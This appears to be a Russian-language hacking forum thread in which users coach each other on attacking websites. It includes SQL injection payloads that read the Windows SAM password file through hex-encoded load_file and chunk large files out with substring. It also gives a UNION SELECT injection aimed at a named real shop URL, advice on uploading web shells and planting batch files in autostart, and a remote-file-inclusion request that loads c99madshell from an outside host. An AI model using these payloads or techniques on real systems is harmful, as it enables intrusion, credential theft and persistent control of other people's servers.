2Chest3r залей шелл , и потом пофантазируй как и что можно ... напрмиер можно батник засунуть в автозагрузку и ждать ребута (или найти вариант ребутнуть сервак) или.... с шелла можешь уже поковырять все конфиги (если прав будет) и там уже будет видно ... P.S мб словишь конфиги к ftp/ssh/etc...
Вобщем, дело сделано, но частично. Отдельное спасибо товарищам CodeSender, Ponchik и ornot! А дело было так! Первоначально файл был прочитан путем хексирования в SQL-запросе - hex(load_file(0x633a5c77696e646f77735c7265706169725c73616d)) , далее сохранил страницу в браузере полностью, открыл в блокноте, обрезал лишнее, а потом конвертировал всю эту муть в HEX-редакторе. Далее файл успешно был скормлен программе SAMInside, однако эта программка как и следовало ожидать, еще и потребовала файл SYSTEM. Тут к сожалению облом - файл весит почти 4 мегабайта и на странице ничего не отображается. Есть какие нибудь идеи по этому поводу? Порылся по разным форумам, нигде не встретилось чтение большого файла через SQL-иньекцию. Спасибо! Обязательно попробую. О_о Классная идея! Почему раньше об этом не подумал... Спасибо!
я не знаю может ли такое даже работать, но попробуй например обрезать какнибудь. substring(LOAD_FILE(''),1,1000) если получится то просто скрипт написать и вытащить потихоньку
Как-то я не особо понял что там такого сложного Code: http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- 1
Вопрос про уязвимость На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
следующий вопрос. Имеем инъекцию, будем считать, что нам ничего не мешает раскрутить ее и получить логин,хэш админа. Но бывает так, что эти действия бесполезны,т.к. админка находится не на самом уязвимом ресурсе, а на хостере, напримеР, http://www.vul-sait.com:2082/ То есть в админку нам не попасть. Тут и возникают несколько вопросов. Может быть все таки можно что то делать дальше? Если не попасть в админку, то как посредством sql через инъекцию редактировать/слить БД, сделать дефейс ну и т.д....всевозможные действия..?
если у тебя иньекция в запросе селект то можеш только "слить" как ты сказал выше. редактировать и тп ни как не сможеш смотри file_priv у пользователя, если повезет сможеш еще файлы читать. смотри права на базу mysql, ищи PMA.. больше ничего. дефейсы на ачате не обсуждаются.
Есть запрос вида /newslist.php?box=5 пишу newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+-- эот уже определил что 5 столбцов, выводит ошибку вида: Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 92 in /ishop/www/tid1/newslist.php on line 35 А если без коментирования остатка (newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+)запроса то такую ошибку: Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 95 order in /ishop/www/tid1/newslist.php on line 35 Warning: ibase_fetch_object(): supplied argument is not a valid Firebird/InterBase result resource in /ishop/www/tid1/newslist.php on line 36 Как дальше раскрутить это все дело?.. во всех этих моментах нету вывода куда либо кроме того где ошибки=\
Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?
Не понятно. Жалуется он очевидно почему, потому что на сервере включен режим SAFE MODE, и владелец каталога куда заливается шелл отличен от владельца загружаемого шелла. Непонятно то, почему у тебя исполняется как ты написал: [qoute] $a=5;echo $a[/qoute]
Тренеруюсь на локальном сервере в sql-inj Вот такой запрос к бд в скрипте. Делаю скулю так И так: Ошибка: Если в скрипте прописать так: То всё работает. Столбцов в таблице 2, записей 3. В чём моя ошибка? ps: Использовал оператор group by всё нормально работает, а с union никак не хочет.
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать. ххх.com/index.php?con=http://site.com/c99madshell на страице открывает шелл , с моим сайтом. ТАк должно быть ? потом перехожу ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ? Если нада доп. инфа говорите.